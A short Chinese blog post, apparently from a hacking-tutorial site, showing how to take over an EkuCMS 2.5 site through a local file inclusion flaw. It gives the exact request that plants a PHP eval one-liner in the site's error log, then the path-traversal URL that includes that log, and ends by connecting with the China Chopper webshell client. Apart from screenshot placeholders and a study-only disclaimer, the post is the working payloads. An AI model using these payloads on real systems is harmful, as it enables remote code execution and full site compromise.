易酷CMS本地包含漏洞拿Shell

  • 内容
  • 相关
测试版本:易酷cms2.5

包含一句话:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])}

A6B55AB9-5DCB-4A8C-92D1-4F00F0C6D799.jpeg

会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日


5A2A388D-CA08-4F68-B5F3-29B36928F649.jpeg



错误日志内容为


4F9DB31B-905F-403F-BC71-FC322307DD7E.jpeg

包含错误日志地址:http://localhost/?s=my/show/id/\..\temp\logs\17_12_23.log

7DF9A482-C1A6-4F31-A6C9-AD95F382FE37.jpeg



使用菜刀链接

93D5F04B-4FC8-49F4-A590-E766E7BB8380.jpeg

连接成功

E4C9D791-BFAE-4BF2-B6C0-5071BF3386A8.jpeg

本文标签:

版权声明:若无特殊注明,本文皆为《花落》原创,转载请保留文章出处。

本文链接:易酷CMS本地包含漏洞拿Shell - http://www.9bwl.com/post-43.html

收录状态: [百度未收录×]  [360未收录×]  [搜狗已收录√]

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

sitemap
00:00 / 00:00
顺序播放